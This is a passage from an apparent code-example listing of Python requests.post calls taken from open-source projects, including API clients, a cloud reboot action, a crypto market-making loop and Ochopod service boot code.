            encodeddata = MultipartEncoder(fields=requestparams['data']) #from requests-toolbelt, necessary for streaming support
            requestparams['data'] = encodeddata
            requestparams['headers']['Content-Type'] = encodeddata.content_type
        r = requests.post(self.url + project + '/input/' + filename,**requestparams)
        sourcefile.close()

        if r.status_code == 400:
            raise clam.common.data.BadRequest()
        elif r.status_code == 401:
            raise clam.common.data.AuthRequired()
        elif r.status_code == 403:
            if r.text[0] == '<':
                #XML response
                return self._parseupload(r.text)
            else:
                raise clam.common.data.PermissionDenied(r.text)
        elif r.status_code == 404:
            raise clam.common.data.NotFound(r.text)
        elif r.status_code == 500:
            raise clam.common.data.ServerError(r.text)
        elif r.status_code == 405:
            raise clam.common.data.ServerError("Server returned 405: Method not allowed for POST on " + self.url + project + '/input/' + filename)
        elif r.status_code == 408:
            raise clam.common.data.TimeOut()
        elif not (r.status_code >= 200 and r.status_code <= 299):
            raise Exception("An error occured, return code " + str(r.status_code))

        return self._parseupload(r.text)

Example 36

Project: runbook Source File: __init__.py
Function: call_action
def call_action(redata, jdata, logger):
    ''' Perform actual call '''

    # Authenticate with Rackspace ID service
    headers = {'Content-Type': 'application/json'}
    authmsg = {
        "auth": {
            "RAX-KSKEY:apiKeyCredentials": {
                "username": redata['data']['username'],
                "apiKey": redata['data']['apikey']
            }
        }
    }
    payload = json.dumps(authmsg)
    url = "https://identity.api.rackspacecloud.com/v2.0/tokens"
    try:
        req = requests.post(
            url, timeout=10.0, data=payload, headers=headers, verify=True)
        retdata = json.loads(req.text)
        # Check Status code and grab required fields from auth data
        if req.status_code == 200:
            token = retdata['access']['token']['id']
            for catalog in retdata['access']['serviceCatalog']:
                if catalog['name'] == redata['data']['resource_type']:
                    for endpoint in catalog['endpoints']:
                        if endpoint['region'] == redata['data']['region']:
                            url = endpoint['publicURL'] + "/servers/" + redata['data']['serverid'] + "/action"
            # Send Reboot Request
            headers = {
                "X-Auth-Token": token,
                "Content-Type": "application/json"
            }
            msg = {
                "reboot": {
                    "type": "HARD"
                }
            }
            payload = json.dumps(msg)
            try:
                req = requests.post(
                    url, timeout=10.0, data=payload,
                    headers=headers, verify=True)
            except:
                line = "rackspace-powercycle: False Rackspace API Call for reaction %s" % (redata['id'])
                logger.info(line)
                return False
        else:
            line = "rackspace-powercycle: False Rackspace Authenticaiton for reaction %s" % (redata['id'])
            logger.info(line)
            return False
    except:
        line = "rackspace-powercycle: False Rackspace Authenticaiton for reaction %s" % (redata['id'])
        logger.info(line)
        return False
    if req.status_code == 202:
        line = "rackspace-powercycle: Reqeust to %s sent for monitor %s - Successful" % (url, jdata['cid'])
        logger.info(line)
        return True
    else:
        line = "rackspace-powercycle: Request to %s sent for monitor %s - False" % (url, jdata['cid'])
        logger.info(line)
        return False

Example 37

Project: snapy Source File: utils.py
Function: request
def request(endpoint, auth_token, data=None, params=None, files=None,
            raise_for_status=True, req_type='post', moreheaders={}):
    """Wrapper method for calling Snapchat API which adds the required auth
    token before sending the request.

    :param endpoint: URL for API endpoint
    :param data: Dictionary containing form data
    :param raise_for_status: Raise exception for 4xx and 5xx status codes
    :param req_type: The request type (GET, POST). Defaults to POST
    """
    if params is not None:
        if 'now' in params:
            now = params['now']
        else:
            now = str(timestamp())

        if 'gauth' in params:
            gauth = params['gauth']
        else:
            gauth = ""
    else:
        now = str(timestamp())
        gauth = ""

    if data is None:
        data = {}
    
    headers = {
        'User-Agent': 'Snapchat/9.16.2.0 (HTC One; Android 5.0.2#482424.2#21; gzip)',
        'Accept-Language': 'en',
        'Accept-Locale': 'en_US',
        'X-Snapchat-Client-Auth-Token': "Bearer " + gauth
    }

    headers.update(moreheaders) 

    URL = 'https://feelinsonice-hrd.appspot.com'
    
    if endpoint == '/loq/login':
        headers.update({
            'Accept-Encoding': 'gzip'
            })

    if endpoint == '/bq/blob':
        headers.update({
            'X-Timestamp': now
            })

    if endpoint == '/loq/login' or endpoint == '/loq/device_id':
        req_token = make_request_token(STATIC_TOKEN, now)
    else:
        req_token = make_request_token(auth_token, now)

    if endpoint != '/bq/story_blob':
        data.update({
            'timestamp': now,
            'req_token': req_token
        })

    if req_type == 'post':
        r = requests.post(URL + endpoint, data=data, files=files,
                          headers=headers, verify=False)
    else:
        if gauth == "": headers = None
        r = requests.get(URL + endpoint, params=data, headers=headers, verify=False)
    if raise_for_status:
        r.raise_for_status()
    return r

Example 38

Project: coinbase-exchange-order-book Source File: strategies.py
def market_maker_strategy(open_orders, order_book, spreads):
    time.sleep(10)
    open_orders.get_open_orders()
    open_orders.cancel_all()
    while True:
        time.sleep(0.005)
        if order_book.asks.price_tree.min_key() - order_book.bids.price_tree.max_key() < 0:
            file_logger.warn('Negative spread: {0}'.format(
                order_book.asks.price_tree.min_key() - order_book.bids.price_tree.max_key()))
            continue
        if not open_orders.open_bid_order_id:
            open_bid_price = order_book.asks.price_tree.min_key() - spreads.bid_spread - open_orders.open_bid_rejections
            if 0.01 * float(open_bid_price) < float(open_orders.accounts['USD']['available']):
                order = {'size': '0.01',
                         'price': str(open_bid_price),
                         'side': 'buy',
                         'product_id': 'BTC-USD',
                         'post_only': True}
                response = requests.post(exchange_api_url + 'orders', json=order, auth=exchange_auth)
                if 'status' in response.json() and response.json()['status'] == 'pending':
                    open_orders.open_bid_order_id = response.json()['id']
                    open_orders.open_bid_price = open_bid_price
                    open_orders.open_bid_rejections = Decimal('0.0')
                    file_logger.info('new bid @ {0}'.format(open_bid_price))
                elif 'status' in response.json() and response.json()['status'] == 'rejected':
                    open_orders.open_bid_order_id = None
                    open_orders.open_bid_price = None
                    open_orders.open_bid_rejections += Decimal('0.04')
                    file_logger.warn('rejected: new bid @ {0}'.format(open_bid_price))
                elif 'message' in response.json() and response.json()['message'] == 'Insufficient funds':
                    open_orders.open_bid_order_id = None
                    open_orders.open_bid_price = None
                    file_logger.warn('Insufficient USD')
                else:
                    file_logger.error('Unhandled response: {0}'.format(pformat(response.json())))
                continue

        if not open_orders.open_ask_order_id:
            open_ask_price = order_book.bids.price_tree.max_key() + spreads.ask_spread + open_orders.open_ask_rejections
            if 0.01 < float(open_orders.accounts['BTC']['available']):
                order = {'size': '0.01',
                         'price': str(open_ask_price),
                         'side': 'sell',
                         'product_id': 'BTC-USD',
                         'post_only': True}
                response = requests.post(exchange_api_url + 'orders', json=order, auth=exchange_auth)
                if 'status' in response.json() and response.json()['status'] == 'pending':
                    open_orders.open_ask_order_id = response.json()['id']
                    open_orders.open_ask_price = open_ask_price
                    file_logger.info('new ask @ {0}'.format(open_ask_price))
                    open_orders.open_ask_rejections = Decimal('0.0')
                elif 'status' in response.json() and response.json()['status'] == 'rejected':
                    open_orders.open_ask_order_id = None
                    open_orders.open_ask_price = None
                    open_orders.open_ask_rejections += Decimal('0.04')
                    file_logger.warn('rejected: new ask @ {0}'.format(open_ask_price))
                elif 'message' in response.json() and response.json()['message'] == 'Insufficient funds':
                    open_orders.open_ask_order_id = None
                    open_orders.open_ask_price = None
                    file_logger.warn('Insufficient BTC')
                else:
                    file_logger.error('Unhandled response: {0}'.format(pformat(response.json())))
                continue

        if open_orders.open_bid_order_id and not open_orders.open_bid_cancelled:
            bid_too_far_out = open_orders.open_bid_price < (order_book.asks.price_tree.min_key()
                                                            - spreads.bid_too_far_adjustment_spread)
            bid_too_close = open_orders.open_bid_price > (order_book.bids.price_tree.max_key()
                                                          - spreads.bid_too_close_adjustment_spread)
            cancel_bid = bid_too_far_out or bid_too_close
            if cancel_bid:
                if bid_too_far_out:
                    file_logger.info('CANCEL: open bid {0} too far from best ask: {1} spread: {2}'.format(
                        open_orders.open_bid_price,
                        order_book.asks.price_tree.min_key(),
                        open_orders.open_bid_price - order_book.asks.price_tree.min_key()))
                if bid_too_close:
                    file_logger.info('CANCEL: open bid {0} too close to best bid: {1} spread: {2}'.format(
                        open_orders.open_bid_price,
                        order_book.bids.price_tree.max_key(),
                        open_orders.open_bid_price - order_book.bids.price_tree.max_key()))
                open_orders.cancel('bid')
                continue

        if open_orders.open_ask_order_id and not open_orders.open_ask_cancelled:
            ask_too_far_out = open_orders.open_ask_price > (order_book.bids.price_tree.max_key() +
                                                            spreads.ask_too_far_adjustment_spread)

            ask_too_close = open_orders.open_ask_price < (order_book.asks.price_tree.min_key() -
                                                          spreads.ask_too_close_adjustment_spread)

            cancel_ask = ask_too_far_out or ask_too_close

            if cancel_ask:
                if ask_too_far_out:
                    file_logger.info('CANCEL: open ask {0} too far from best bid: {1} spread: {2}'.format(
                        open_orders.open_ask_price,
                        order_book.bids.price_tree.max_key(),
                        open_orders.open_ask_price - order_book.bids.price_tree.max_key()))
                if ask_too_close:
                    file_logger.info('CANCEL: open ask {0} too close to best ask: {1} spread: {2}'.format(
                        open_orders.open_ask_price,
                        order_book.asks.price_tree.min_key(),
                        open_orders.open_ask_price - order_book.asks.price_tree.min_key()))
                open_orders.cancel('ask')
                continue

Example 39

Project: ochonetes Source File: io.py
Function: fire
def fire(zk, cluster, command, subset=None, timeout=10.0, js=None):
    """
    Helper looking zero or more pods up and firing a HTTP control request to each one in parallel. The pod control
    port will be looked up & remapped automatically. The outcome is a dict keying a compound identifier (cluster + pod
    sequence index) to a 2-uple (the pod response and the corresponding HTTP code).

    By default the external IP address is used to reach the pods. This can be reverted so that the internal IP is
    used by setting the $OCHOPOD_USE_INTERNAL_IPS environment variable (typically to run tools from within the
    cluster).

    :type zk: :class:`kazoo.client.KazooClient`
    :type cluster: str
    :type command: str
    :type subset: list
    :type timeout: float
    :param zk: the underlying zookeeper client
    :param cluster: the cluster(s) to query, as a glob pattern (e.g "*.zookeeper")
    :param subset: optional integer array used to select specific pods based on their sequence index
    :param timeout: optional timeout in seconds
    :rtype: dict
    """

    class _Post(Thread):
        """
        We optimize a bit the HTTP queries to the pods by running them on separate threads (this can be a
        tad slow otherwise for more than 10 queries in a row)
        """

        def __init__(self, key, hints):
            super(_Post, self).__init__()

            self.key = key
            self.hints = hints
            self.body = None
            self.code = None

            self.start()

        def run(self):

            url = 'N/A'
            try:
                ts = time.time()
                port = self.hints['port']
                assert port in self.hints['ports'], 'ochopod control port not exposed @ %s (user error ?)' % self.key
                url = 'http://%s:%d/%s' % (self.hints['ip'], self.hints['ports'][port], command)
                reply = requests.post(url, timeout=timeout, data=js)
                self.body = reply.json()
                self.code = reply.status_code
                ms = 1000 * (time.time() - ts)
                logger.debug('-> %s (HTTP %d, %s ms)' % (url, reply.status_code, int(ms)))

            except HTTPTimeout:
                logger.debug('-> %s (timeout)' % url)

            except Exception as failure:
                logger.debug('-> %s (i/o error, %s)' % (url, failure))

        def join(self, timeout=None):

            Thread.join(self)
            return self.key, self.hints['seq'], self.body, self.code

    #
    # - lookup our pods based on the cluster(s) we want
    # - fire a thread for each
    #
    pods = lookup(zk, cluster, subset=subset)
    threads = [_Post(pod, hints) for pod, hints in pods.items()]
    out = [thread.join() for thread in threads]
    return {key: (seq, body, code) for (key, seq, body, code) in out if code}

Example 40

Project: clam Source File: client.py
Function: add_input
    def addinput(self, project, inputtemplate, contents, **kwargs):
        """Add an input file to the CLAM service. Explictly providing the contents as a string. This is not suitable for large files as the contents are kept in memory! Use ``addinputfile()`` instead for large files.

        project - the ID of the project you want to add the file to.
        inputtemplate - The input template you want to use to add this file (InputTemplate instance)
        contents - The contents for the file to add (string)

        Keyword arguments:
            * filename - the filename on the server (mandatory!)
            * metadata - A metadata object.
            * metafile - A metadata file (filename)

        Any other keyword arguments will be passed as metadata and matched with the input template's parameters.

        Example::

            client.addinput("myproject", "someinputtemplate", "This is a test.", filename="test.txt")

        With metadata, assuming such metadata parameters are defined::

            client.addinput("myproject", "someinputtemplate", "This is a test.", filename="test.txt", parameter1="blah", parameterX=3.5))

        """
        if isinstance( inputtemplate, str) or (sys.version < '3' and isinstance( inputtemplate, unicode)): #pylint: disable=undefined-variable
            data = self.get(project) #causes an extra query to server
            inputtemplate = data.inputtemplate(inputtemplate)
        elif not isinstance(inputtemplate, clam.common.data.InputTemplate):
            raise Exception("inputtemplate must be instance of InputTemplate. Get from CLAMData.inputtemplate(id)")


        if 'filename' in kwargs:
            filename = self.getinputfilename(inputtemplate, kwargs['filename'])
        else:
            raise Exception("No filename provided!")

        data = {"contents": contents, 'inputtemplate': inputtemplate.id}
        for key, value in kwargs.items():
            if key == 'filename':
                pass #nothing to do
            elif key == 'metadata':
                assert isinstance(value, clam.common.data.CLAMMetaData)
                data['metadata'] =  value.xml()
            elif key == 'metafile':
                data['metafile'] = open(value,'r')
            else:
                data[key] = value


        requestparams = self.initrequest(data)
        r = requests.post(self.url + project + '/input/' + filename,**requestparams)

        if r.status_code == 400:
            raise clam.common.data.BadRequest()
        elif r.status_code == 401:
            raise clam.common.data.AuthRequired()
        elif r.status_code == 403:
            if r.text[0] == '<':
                #XML response
                return self._parseupload(r.text)
            else:
                raise clam.common.data.PermissionDenied(r.text)
        elif r.status_code == 404:
            raise clam.common.data.NotFound(r.text)
        elif r.status_code == 500:
            raise clam.common.data.ServerError(r.text)
        elif r.status_code == 405:
            raise clam.common.data.ServerError("Server returned 405: Method not allowed for POST on " + self.url + project + '/input/' + filename)
        elif r.status_code == 408:
            raise clam.common.data.TimeOut()
        elif not (r.status_code >= 200 and r.status_code <= 299):
            raise Exception("An error occured, return code " + str(r.status_code))

        return self._parseupload(r.text)

Example 41

Project: threatshell Source File: threat_q.py
Function: add_indicator
    def add_indicator(self, args):

        type_map = self._get_type_map()
        status_map = self._get_status_map()

        parser = argparse.ArgumentParser(usage="tq_add")
        parser.add_argument(
            "indicator",
            action="store",
            help="Specify the indicator to be added"
        )

        parser.add_argument(
            "-c",
            "--class_type",
            action="store",
            choices=["network", "host"],
            metavar="TYPE",
            required=True,
            help=(
                "Specify indicator class. Valid choices are: %s"
            ) % ", ".join(["network", "host"])
        )

        parser.add_argument(
            "-t",
            "--type",
            action="store",
            choices=type_map.keys(),
            metavar="TYPE",
            required=True,
            help=(
                "Specify the indicator type. Valid choices are: %s"
            ) % (", ".join(type_map.keys()))
        )

        parser.add_argument(
            "-s",
            "--status",
            action="store",
            choices=status_map.keys(),
            metavar="STATUS",
            required=True,
            help=(
                "Specify the indicator status. Valid choices are: %s"
            ) % ", ".join(status_map.keys())
        )

        try:
            parsed_args = parser.parse_args(args=shlex.split(args))
        except SystemExit, e:
            if str(e) != "0":
                log.error(
                    "Invalid argument for query (use -h or --help " +
                    "to see command options)"
                )
            return {}

        query_url = "%s/api/indicators/" % self.url
        params = {
            "api_key": self.key,
            "indicator": parsed_args.indicator,
            "indicator_class": parsed_args.class_type,
            "indicator_type_id": str(type_map[parsed_args.type]),
            "indicator_status_id": str(status_map[parsed_args.status])
        }

        r = requests.post(
            query_url,
            params=params,
            verify=False
        )

        if r.status_code != 200:
            log.error("[tqadd] Got back status code %s" % r.status_code)
            return {
                parsed_args.indicator: "Failed with error code %s" % (
                    r.status_code
                )
            }

        rc = r.content
        if not rc:
            return "No reply"
        return rc

Example 42

Project: pyuClassify Source File: uclassify.py
    def classifyKeywords(self,texts,classifierName,username = None):
        """Performs classification on texts.
           :param texts: (required) A List of texts that needs to be classified.
           :param classifierName: (required) Classifier Name
           :param username: (optional): Name of the user, under whom the classifier exists.
        """
        doc,root_element = self._buildbasicXMLdoc()
        textstag = doc.createElement("texts")
        readcalls = doc.createElement("readCalls")
        if self.readApiKey == None:
            raise uClassifyError("Read API Key not Initialized")
        readcalls.setAttribute("readApiKey",self.readApiKey)
        root_element.appendChild(textstag)
        root_element.appendChild(readcalls)
        base64texts = []
        for text in texts:
            base64_text = base64.b64encode(text) #For Python version 3, need to change.
            base64texts.append(base64_text)
        counter = 1
        for text in base64texts:
            textbase64 = doc.createElement("textBase64")
            classifytag = doc.createElement("classifyKeywords")
            textbase64.setAttribute("id","Classifytext"+ str(counter))
            ptext = doc.createTextNode(text)
            textbase64.appendChild(ptext)
            classifytag.setAttribute("id","Classify"+ str(counter))
            classifytag.setAttribute("classifierName",classifierName)
            classifytag.setAttribute("textId","Classifytext"+str(counter))
            if username != None:
                classifytag.setAttribute("username",username)
            textstag.appendChild(textbase64)
            readcalls.appendChild(classifytag)
            counter = counter + 1
        r = requests.post(self.api_url,doc.toxml())
        if r.status_code == 200:
            success, status_code, text = self._getResponseCode(r.content)
            if success == "false":
                raise uClassifyError(text,status_code)
            else:
                return self.parseClassifyResponse(r.content,texts)
        else:
            raise uClassifyError("Bad XML Request Sent")
        
        def parseClassifyKeywordResponse(self,content,texts):
            """Parses the Classifier response from the server.
              :param content: (required) XML Response from server.
            """
            counter = 0
            doc = xml.dom.minidom.parseString(content)
            node = doc.docuementElement
            result = []
            keyw = []
            classifytags = node.getElementsByTagName("classification")
            keywordstags = node.getElementsByTagName("keywords")
            for keyword in keywordstags:
                classtags = keyword.getElementsByTagName("class")
                for ctag in classtags:
                    kw = ctag.firstChild.data
                if kw != "":
                    keyw.append(kw)
            for classi in classifytags:
                text_coverage = classi.getAttribute("textCoverage")
                classtags = classi.getElementsByTagName("class")
                cresult = []
                for ctag in classtags:
                    classname = ctag.getAttribute("className")
                    cper = ctag.getAttribute("p")
                    tup = (classname,cper)
                    cresult.append(tup)
                result.append((texts[counter],text_coverage,cresult,keyw))
                counter = counter + 1
            return result

Example 43

Project: scalarizr Source File: producer.py
    def _send0(self, queue, message, success_callback=None, fail_callback=None):
        response = None
        try:
            use_json = __node__['message_format'] == 'json'
            data = message.tojson() if use_json else message.toxml()

            content_type = 'application/%s' % 'json' if use_json else 'xml'
            headers = {'Content-Type': content_type}

            if message.name not in ('Log',
                                    'OperationDefinition',
                                    'OperationProgress',
                                    'OperationResult'):
                msg_copy = P2pMessage(message.name, message.meta.copy(), deepcopy(message.body))
                try:
                    del msg_copy.body['chef']['validator_name']
                    del msg_copy.body['chef']['validator_key']
                except (KeyError, TypeError):
                    pass
                self._logger.debug("Delivering message '%s' %s. Json: %s, Headers: %s",
                                   message.name, msg_copy.body, use_json, headers)

            for f in self.filters['protocol']:
                data = f(self, queue, data, headers)

            url = self.endpoint + "/" + queue
            response = requests.post(url, data=data, headers=headers, verify=False)
            response.raise_for_status()
            self._message_delivered(queue, message, success_callback)

        except:
            e = sys.exc_info()[1]

            self._logger.warning("Message '%s' not delivered (message_id: %s)",
                message.name, message.id)
            self.fire("send_error", e, queue, message)

            if isinstance(e, requests.RequestException):
                if isinstance(e, requests.ConnectionError):
                    self._logger.warn("Connection error: %s", e)
                elif response.status_code == 401:
                    self._logger.warn("Cannot authenticate on message server. %s", e)
                elif response.status_code == 400:
                    self._logger.warn("Malformed request. %s", e)
                else:
                    self._logger.warn("Cannot post message to %s. %s", url, e)
                if response and response.status_code in (509, 400, 403):
                    raise
            else:
                self._logger.warn('Caught exception', exc_info=sys.exc_info())

            if fail_callback:
                fail_callback(queue, message, e)

Example 44

Project: ochopod Source File: marathon.py
    def boot(self, lifecycle, model=Reactive, tools=None, local=False):

        #
        # - quick check to make sure we get the right implementations
        #
        assert issubclass(model, Model), 'model must derive from ochopod.api.Model'
        assert issubclass(lifecycle, LifeCycle), 'lifecycle must derive from ochopod.api.LifeCycle'

        #
        # - instantiate our flask endpoint
        # - default to a json handler for all HTTP errors (including an unexpected 500)
        #
        def _handler(error):
            http = error.code if isinstance(error, HTTPException) else 500
            return '{}', http, {'Content-Type': 'application/json; charset=utf-8'}

        web = Flask(__name__)
        for code in default_exceptions.iterkeys():
            web.error_handler_spec[None][code] = _handler

        #
        # - default presets in case we run outside of marathon (local vm testing)
        # - any environment variable prefixed with "ochopod." is of interest for us (e.g this is what the user puts
        #   in the marathon application configuration for instance)
        # - the other settings come from marathon (namely the port bindings & application/task identifiers)
        # - the MESOS_TASK_ID is important to keep around to enable task deletion via the marathon REST API
        #
        env = \
            {
                'ochopod_application':  '',
                'ochopod_cluster':      'default',
                'ochopod_debug':        'true',
                'ochopod_local':        'false',
                'ochopod_namespace':    'marathon',
                'ochopod_port':         '8080',
                'ochopod_start':        'true',
                'ochopod_task':         '',
                'ochopod_zk':           '',
                'PORT_8080':            '8080'
            }

        env.update(os.environ)
        ochopod.enable_cli_log(debug=env['ochopod_debug'] == 'true')
        try:

            #
            # - grab our environment variables (which are set by the marathon executor)
            # - extract the mesos PORT_* bindings and construct a small remapping dict
            #
            ports = {}
            logger.debug('environment ->\n%s' % '\n'.join(['\t%s -> %s' % (k, v) for k, v in env.items()]))
            for key, val in env.items():
                if key.startswith('PORT_'):
                    ports[key[5:]] = int(val)

            #
            # - keep any "ochopod_" environment variable & trim its prefix
            # - default all our settings, especially the mandatory ones
            # - the ip and zookeeper are defaulted to localhost to enable easy testing
            #
            hints = {k[8:]: v for k, v in env.items() if k.startswith('ochopod_')}
            if local or hints['local'] == 'true':

                #
                # - we are running in local mode (e.g on a dev workstation)
                # - default everything to localhost
                #
                logger.info('running in local mode (make sure you run a standalone zookeeper)')
                hints.update(
                    {
                        'fwk':          'marathon (debug)',
                        'ip':           '127.0.0.1',
                        'node':         'local',
                        'ports':        ports,
                        'public':       '127.0.0.1',
                        'zk':           '127.0.0.1:2181'
                    })
            else:

                #
                # - extend our hints
                # - add the application + task
                #
                hints.update(
                    {
                        'application':  env['MARATHON_APP_ID'][1:],
                        'fwk':          'marathon',
                        'ip':           '',
                        'node':         '',
                        'ports':        ports,
                        'public':       '',
                        'task':         env['MESOS_TASK_ID'],
                        'zk':           ''
                    })

                #
                # - use whatever subclass is implementing us to infer 'ip', 'node' and 'public'
                #
                hints.update(self.get_node_details())

                #
                # - lookup for the zookeeper connection string from environment variable or on disk
                # - we have to look into different places depending on how mesos was installed
                #
                def _1():

                    #
                    # - most recent DCOS release
                    # - $MESOS_MASTER is located in /opt/mesosphere/etc/mesos-slave-common
                    # - the snippet in there is prefixed by MESOS_MASTER=zk://<ip:port>/mesos
                    #
                    logger.debug('checking /opt/mesosphere/etc/mesos-slave-common...')
                    _, lines = shell("grep MESOS_MASTER /opt/mesosphere/etc/mesos-slave-common")
                    return lines[0][13:]

                def _2():

                    #
                    # - same as above except for slightly older DCOS releases
                    # - $MESOS_MASTER is located in /opt/mesosphere/etc/mesos-slave
                    #
                    logger.debug('checking /opt/mesosphere/etc/mesos-slave...')
                    _, lines = shell("grep MESOS_MASTER /opt/mesosphere/etc/mesos-slave")
                    return lines[0][13:]

                def _3():

                    #
                    # - a regular package install will write the slave settings under /etc/mesos/zk (the snippet in
                    #   there looks like zk://10.0.0.56:2181/mesos)
                    #
                    logger.debug('checking /etc/mesos/zk...')
                    _, lines = shell("cat /etc/mesos/zk")
                    return lines[0]

                def _4():

                    #
                    # - look for ZK from environment variables
                    # - user can pass down ZK using $ochopod_zk
                    # - this last-resort situation is used mostly for debugging
                    #
                    logger.debug('checking $ochopod_zk environment variable...')
                    return env['ochopod_zk']

                #
                # - depending on how the slave has been installed we might have to look in various places
                #   to find out what our zookeeper connection string is
                # - use urlparse to keep the host:port part of the URL (possibly including a login+password)
                #
                for method in [_1, _2, _3, _4]:
                    try:
                        hints['zk'] = urlparse(method()).netloc
                        break

                    except Exception:
                        pass

            #
            # - the cluster must be fully qualified with a namespace (which is defaulted anyway)
            #
            assert hints['zk'], 'unable to determine where zookeeper is located (unsupported/bogus mesos setup ?)'
            assert hints['cluster'] and hints['namespace'], 'no cluster and/or namespace defined (user error ?)'

            #
            # - load the tools
            #
            if tools:
                tools = {tool.tag: tool for tool in [clz() for clz in tools if issubclass(clz, Tool)] if tool.tag}
                logger.info('supporting tools %s' % ', '.join(tools.keys()))

            #
            # - start the life-cycle actor which will pass our hints (as a json object) to its underlying sub-process
            # - start our coordinator which will connect to zookeeper and attempt to lead the cluster
            # - upon grabbing the lock the model actor will start and implement the configuration process
            # - the hints are a convenient bag for any data that may change at runtime and needs to be returned (via
            #   the HTTP POST /info request)
            # - what's being registered in zookeeper is immutable though and decorated with additional details by
            #   the coordinator (especially the pod index which is derived from zookeeper)
            #
            latch = ThreadingFuture()
            logger.info('starting %s.%s (marathon) @ %s' % (hints['namespace'], hints['cluster'], hints['node']))
            breadcrumbs = deepcopy(hints)
            hints['metrics'] = {}
            hints['dependencies'] = model.depends_on
            env.update({'ochopod': json.dumps(hints)})
            executor = lifecycle.start(env, latch, hints)
            coordinator = Coordinator.start(
                hints['zk'].split(','),
                hints['namespace'],
                hints['cluster'],
                int(hints['port']),
                breadcrumbs,
                model,
                hints)

            #
            # - external hook forcing a coordinator reset
            # - this will force a re-connection to zookeeper and pod registration
            # - please note this will not impact the pod lifecycle (e.g the underlying sub-process will be
            #   left running)
            #
            @web.route('/reset', methods=['POST'])
            def _reset():

                logger.debug('http in -> /reset')
                coordinator.tell({'request': 'reset'})
                return '{}', 200, {'Content-Type': 'application/json; charset=utf-8'}

            #
            # - external hook exposing information about our pod
            # - this is a subset of what's registered in zookeeper at boot-time
            # - the data is dynamic and updated from time to time by the model and executor actors
            # - from @pferro -> the pod's dependencies defined in the model are now added as well
            #
            @web.route('/info', methods=['POST'])
            def _info():

                logger.debug('http in -> /info')
                keys = \
                    [
                        'application',
                        'dependencies',
                        'ip',
                        'metrics',
                        'node',
                        'port',
                        'ports',
                        'process',
                        'public',
                        'state',
                        'status',
                        'task'
                    ]

                subset = dict(filter(lambda i: i[0] in keys, hints.iteritems()))
                return json.dumps(subset), 200, {'Content-Type': 'application/json; charset=utf-8'}

            #
            # - external hook exposing our circular log
            # - reverse and dump ochopod.log as a json array
            #
            @web.route('/log', methods=['POST'])
            def _log():

                logger.debug('http in -> /log')
                with open(ochopod.LOG, 'r+') as log:
                    lines = [line for line in log]
                    return json.dumps(lines), 200, {'Content-Type': 'application/json; charset=utf-8'}

            #
            # - RPC call to run a custom tool within the pod
            #
            @web.route('/exec', methods=['POST'])
            def _exec():

                logger.debug('http in -> /exec')

                #
                # - make sure the command (first token in the X-Shell header) maps to a tool
                # - if no match abort on a 404
                #
                line = request.headers['X-Shell']
                tokens = line.split(' ')
                cmd = tokens[0]
                if not tools or cmd not in tools:
                    return '{}', 404, {'Content-Type': 'application/json; charset=utf-8'}

                code = 1
                tool = tools[cmd]

                #
                # - make sure the parser does not sys.exit()
                #
                class _Parser(ArgumentParser):
                    def exit(self, status=0, message=None):
                        raise ValueError(message)

                #
                # - prep a temporary directory
                # - invoke define_cmdline_parsing()
                # - switch off parsing if NotImplementedError is raised
                #
                use_parser = 1
                parser = _Parser(prog=tool.tag)
                try:
                    tool.define_cmdline_parsing(parser)

                except NotImplementedError:
                    use_parser = 0

                tmp = tempfile.mkdtemp()
                try:

                    #
                    # - parse the command line
                    # - upload any attachment
                    #
                    args = parser.parse_args(tokens[1:]) if use_parser else ' '.join(tokens[1:])
                    for tag, upload in request.files.items():
                        where = path.join(tmp, tag)
                        logger.debug('uploading %s @ %s' % (tag, tmp))
                        upload.save(where)

                    #
                    # - run the tool method
                    # - pass the temporary directory as well
                    #
                    logger.info('invoking "%s"' % line)
                    code, lines = tool.body(args, tmp)

                except ValueError as failure:

                    lines = [parser.format_help() if failure.message is None else failure.message]

                except Exception as failure:

                    lines = ['unexpected failure -> %s' % failure]

                finally:

                    #
                    # - make sure to cleanup our temporary directory
                    #
                    shutil.rmtree(tmp)

                out = \
                    {
                        'code': code,
                        'stdout': lines
                    }

                return json.dumps(out), 200, {'Content-Type': 'application/json; charset=utf-8'}

            #
            # - web-hook used to receive requests from the leader or the CLI tools
            # - those requests are passed down to the executor actor
            # - any non HTTP 200 response is a failure
            # - failure to acknowledge within the specified timeout will result in a HTTP 408 (REQUEST TIMEOUT)
            # - attempting to send a control request to a dead pod will result in a HTTP 410 (GONE)
            #
            @web.route('/control/<task>', methods=['POST'])
            @web.route('/control/<task>/<timeout>', methods=['POST'])
            def _control(task, timeout='60'):

                logger.debug('http in -> /control/%s' % task)
                if task not in ['check', 'on', 'off', 'ok', 'kill', 'signal']:

                    #
                    # - fail on a HTTP 400 if the request is not supported
                    #
                    return '{}', 400, {'Content-Type': 'application/json; charset=utf-8'}

                try:

                    ts = time.time()
                    latch = ThreadingFuture()
                    executor.tell({'request': task, 'latch': latch, 'data': request.data})
                    js, code = latch.get(timeout=int(timeout))
                    ms = time.time() - ts
                    logger.debug('http out -> HTTP %s (%d ms)' % (code, ms))
                    return json.dumps(js), code, {'Content-Type': 'application/json; charset=utf-8'}

                except Timeout:

                    #
                    # - we failed to match the specified timeout
                    # - gracefully fail on a HTTP 408
                    #
                    return '{}', 408, {'Content-Type': 'application/json; charset=utf-8'}

                except ActorDeadError:

                    #
                    # - the executor has been shutdown (probably after a /control/kill)
                    # - gracefully fail on a HTTP 410
                    #
                    return '{}', 410, {'Content-Type': 'application/json; charset=utf-8'}

            #
            # - internal hook required to shutdown the web-server
            # - it's not possible to do it outside of a request handler
            # - make sure this calls only comes from localhost (todo)
            #
            @web.route('/terminate', methods=['POST'])
            def _terminate():

                request.environ.get('werkzeug.server.shutdown')()
                return '{}', 200, {'Content-Type': 'application/json; charset=utf-8'}

            #
            # - run werkzeug from a separate thread to avoid blocking the main one
            # - we'll have to shut it down using a dedicated HTTP POST
            #
            class _Runner(threading.Thread):

                def run(self):
                    web.run(host='0.0.0.0', port=int(hints['port']), threaded=True)

            try:

                #
                # - block on the lifecycle actor until it goes down (usually after a /control/kill request)
                #
                _Runner().start()
                spin_lock(latch)
                logger.debug('pod is dead, idling')
                while 1:

                    #
                    # - simply idle forever (since the framework would restart any container that terminates)
                    # - /log and /hints HTTP requests will succeed (and show the pod as being killed)
                    # - any control request will now fail
                    #
                    time.sleep(60.0)

            finally:

                #
                # - when we exit the block first shutdown our executor (which may probably be already down)
                # - then shutdown the coordinator to un-register from zookeeper
                # - finally ask werkzeug to shutdown via a REST call
                #
                shutdown(executor)
                shutdown(coordinator)
                post('http://127.0.0.1:%s/terminate' % env['ochopod_port'])

        except KeyboardInterrupt:

